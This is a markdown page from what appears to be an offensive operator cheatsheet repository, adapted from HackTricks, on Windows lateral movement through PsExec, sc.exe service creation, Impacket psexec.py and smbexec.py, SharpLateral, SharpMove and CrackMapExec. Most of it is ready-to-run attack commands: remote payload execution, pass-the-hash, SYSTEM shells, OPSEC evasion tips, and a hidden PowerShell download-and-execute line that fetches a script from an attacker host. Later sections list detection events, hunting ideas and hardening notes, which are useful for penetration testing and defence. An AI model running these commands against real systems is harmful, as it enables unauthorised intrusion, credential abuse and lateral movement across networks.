daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

psexec-and-winexec.md (8859B)


      1 ---
      2 title: "PsExec/Winexec/ScExec/SMBExec"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/lateral-movement/psexec-and-winexec.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/lateral-movement/psexec-and-winexec.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # PsExec/Winexec/ScExec/SMBExec
     14 
     15 ## How do they work
     16 
     17 These techniques abuse the Windows Service Control Manager (SCM) remotely over SMB/RPC to execute commands on a target host. The common flow is:
     18 
     19 1. Authenticate to the target and access the ADMIN$ share over SMB (TCP/445).
     20 2. Copy an executable or specify a LOLBAS command line that the service will run.
     21 3. Create a service remotely via SCM (MS-SCMR over \PIPE\svcctl) pointing to that command or binary.
     22 4. Start the service to execute the payload and optionally capture stdin/stdout via a named pipe.
     23 5. Stop the service and clean up (delete the service and any dropped binaries).
     24 
     25 Requirements/prereqs:
     26 - Local Administrator on the target (SeCreateServicePrivilege) or explicit service creation rights on the target.
     27 - SMB (445) reachable and ADMIN$ share available; Remote Service Management allowed through host firewall.
     28 - UAC Remote Restrictions: with local accounts, token filtering may block admin over the network unless using the built-in Administrator or LocalAccountTokenFilterPolicy=1.
     29 - Kerberos vs NTLM: using a hostname/FQDN enables Kerberos; connecting by IP often falls back to NTLM (and may be blocked in hardened environments).
     30 
     31 ### Manual ScExec/WinExec via sc.exe
     32 
     33 The following shows a minimal service-creation approach. The service image can be a dropped EXE or a LOLBAS like cmd.exe or powershell.exe.
     34 
     35 ```batch
     36 :: Execute a one-liner without dropping a binary
     37 sc.exe \\TARGET create HTSvc binPath= "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt" start= demand
     38 sc.exe \\TARGET start HTSvc
     39 sc.exe \\TARGET delete HTSvc
     40 
     41 :: Drop a payload to ADMIN$ and execute it (example path)
     42 copy payload.exe \\TARGET\ADMIN$\Temp\payload.exe
     43 sc.exe \\TARGET create HTSvc binPath= "C:\\Windows\\Temp\\payload.exe" start= demand
     44 sc.exe \\TARGET start HTSvc
     45 sc.exe \\TARGET delete HTSvc
     46 ```
     47 
     48 Notes:
     49 - Expect a timeout error when starting a non-service EXE; execution still happens.
     50 - To remain more OPSEC-friendly, prefer fileless commands (cmd /c, powershell -enc) or delete dropped artifacts.
     51 
     52 Find more detailed steps in: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/<sup>[[3]](#references)</sup>
     53 
     54 ## Tooling and examples
     55 
     56 ### Sysinternals PsExec.exe
     57 
     58 - Classic admin tool that uses SMB to drop PSEXESVC.exe in ADMIN$, installs a temporary service (default name PSEXESVC), and proxies I/O over named pipes.
     59 - Example usages:<sup>[[1]](#references)</sup>
     60 
     61 ```batch
     62 :: Interactive SYSTEM shell on remote host
     63 PsExec64.exe -accepteula \\HOST -s -i cmd.exe
     64 
     65 :: Run a command as a specific domain user
     66 PsExec64.exe -accepteula \\HOST -u DOMAIN\user -p 'Passw0rd!' cmd.exe /c whoami /all
     67 
     68 :: Customize the service name for OPSEC (-r)
     69 PsExec64.exe -accepteula \\HOST -r WinSvc$ -s cmd.exe /c ipconfig
     70 ```
     71 
     72 - You can launch directly from Sysinternals Live via WebDAV:
     73 
     74 ```batch
     75 \\live.sysinternals.com\tools\PsExec64.exe -accepteula \\HOST -s cmd.exe /c whoami
     76 ```
     77 
     78 OPSEC
     79 - Leaves service install/uninstall events (Service name often PSEXESVC unless -r is used) and creates C:\Windows\PSEXESVC.exe during execution.
     80 
     81 ### Impacket psexec.py (PsExec-like)
     82 
     83 - Uses an embedded RemCom-like service. Drops a transient service binary (commonly randomized name) via ADMIN$, creates a service (default often RemComSvc), and proxies I/O over a named pipe.
     84 
     85 ```bash
     86 # Password auth
     87 psexec.py DOMAIN/user:Password@HOST cmd.exe
     88 
     89 # Pass-the-Hash
     90 psexec.py -hashes LMHASH:NTHASH DOMAIN/user@HOST cmd.exe
     91 
     92 # Kerberos (use tickets in KRB5CCNAME)
     93 psexec.py -k -no-pass -dc-ip 10.0.0.10 DOMAIN/user@host.domain.local cmd.exe
     94 
     95 # Change service name and output encoding
     96 psexec.py -service-name HTSvc -codec utf-8 DOMAIN/user:Password@HOST powershell -nop -w hidden -c "iwr http://10.10.10.1/a.ps1|iex"
     97 ```
     98 
     99 Artifacts
    100 - Temporary EXE in C:\Windows\ (random 8 chars). Service name defaults to RemComSvc unless overridden.
    101 
    102 ### Impacket smbexec.py (SMBExec)
    103 
    104 - Creates a temporary service that spawns cmd.exe and uses a named pipe for I/O. Generally avoids dropping a full EXE payload; command execution is semi-interactive.
    105 
    106 ```bash
    107 smbexec.py DOMAIN/user:Password@HOST
    108 smbexec.py -hashes LMHASH:NTHASH DOMAIN/user@HOST
    109 ```
    110 
    111 ### SharpLateral and SharpMove
    112 
    113 - [SharpLateral](https://github.com/mertdas/SharpLateral) (C#) implements several lateral movement methods including service-based exec.
    114 
    115 ```batch
    116 SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
    117 ```
    118 
    119 - [SharpMove](https://github.com/0xthirteen/SharpMove) includes service modification/creation to execute a command remotely.
    120 
    121 ```batch
    122 SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
    123 SharpMove.exe action=startservice computername=remote.host.local servicename=TestService
    124 ```
    125 
    126 - You can also use CrackMapExec to execute via different backends (psexec/smbexec/wmiexec):
    127 
    128 ```bash
    129 cme smb HOST -u USER -p PASS -x "whoami" --exec-method psexec
    130 cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec
    131 ```
    132 
    133 ## OPSEC, detection and artifacts
    134 
    135 Typical host/network artifacts when using PsExec-like techniques:
    136 - Security 4624 (Logon Type 3) and 4672 (Special Privileges) on target for the admin account used.
    137 - Security 5140/5145 File Share and File Share Detailed events showing ADMIN$ access and create/write of service binaries (e.g., PSEXESVC.exe or random 8-char .exe).
    138 - Security 7045 Service Install on target: service names like PSEXESVC, RemComSvc, or custom (-r / -service-name).
    139 - Sysmon 1 (Process Create) for services.exe or the service image, 3 (Network Connect), 11 (File Create) in C:\Windows\, 17/18 (Pipe Created/Connected) for pipes such as \\.\pipe\psexesvc, \\.\pipe\remcom_*, or randomized equivalents.
    140 - Registry artifact for Sysinternals EULA: HKCU\Software\Sysinternals\PsExec\EulaAccepted=0x1 on the operator host (if not suppressed).
    141 
    142 Hunting ideas
    143 - Alert on service installs where the ImagePath includes cmd.exe /c, powershell.exe, or TEMP locations.
    144 - Look for process creations where ParentImage is C:\Windows\PSEXESVC.exe or children of services.exe running as LOCAL SYSTEM executing shells.
    145 - Flag named pipes ending with -stdin/-stdout/-stderr or well-known PsExec clone pipe names.
    146 
    147 ## Troubleshooting common failures
    148 - Access is denied (5) when creating services: not truly local admin, UAC remote restrictions for local accounts, or EDR tampering protection on the service binary path.
    149 - The network path was not found (53) or could not connect to ADMIN$: firewall blocking SMB/RPC or admin shares disabled.
    150 - Kerberos fails but NTLM is blocked: connect using hostname/FQDN (not IP), ensure proper SPNs, or supply -k/-no-pass with tickets when using Impacket.
    151 - Service start times out but payload ran: expected if not a real service binary; capture output to a file or use smbexec for live I/O.
    152 
    153 ## Hardening notes
    154 - Windows 11 24H2 and Windows Server 2025 require SMB signing by default for outbound (and Windows 11 inbound) connections. This does not break legitimate PsExec usage with valid creds but prevents unsigned SMB relay abuse and may impact devices that don’t support signing.<sup>[[2]](#references)</sup>
    155 - New SMB client NTLM blocking (Windows 11 24H2/Server 2025) can prevent NTLM fallback when connecting by IP or to non-Kerberos servers. In hardened environments this will break NTLM-based PsExec/SMBExec; use Kerberos (hostname/FQDN) or configure exceptions if legitimately needed.<sup>[[2]](#references)</sup>
    156 - Principle of least privilege: minimize local admin membership, prefer Just-in-Time/Just-Enough Admin, enforce LAPS, and monitor/alert on 7045 service installs.
    157 
    158 ## See also
    159 
    160 - WMI-based remote exec (often more fileless):
    161 
    162 [Wmiexec](/hacktricks/windows-hardening/lateral-movement/wmiexec)
    163 
    164 - WinRM-based remote exec:
    165 
    166 [Winrm](/hacktricks/windows-hardening/lateral-movement/winrm)
    167 
    168 ## References
    169 
    170 - [1] [PsExec - Sysinternals | Microsoft Learn](https://learn.microsoft.com/sysinternals/downloads/psexec)
    171 - [2] [SMB security hardening in Windows Server 2025 & Windows 11](https://techcommunity.microsoft.com/blog/filecab/smb-security-hardening-in-windows-server-2025--windows-11/4226591)
    172 - [3] [Using Credentials to Own Windows Boxes - Part 2 (PSExec and Services)](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)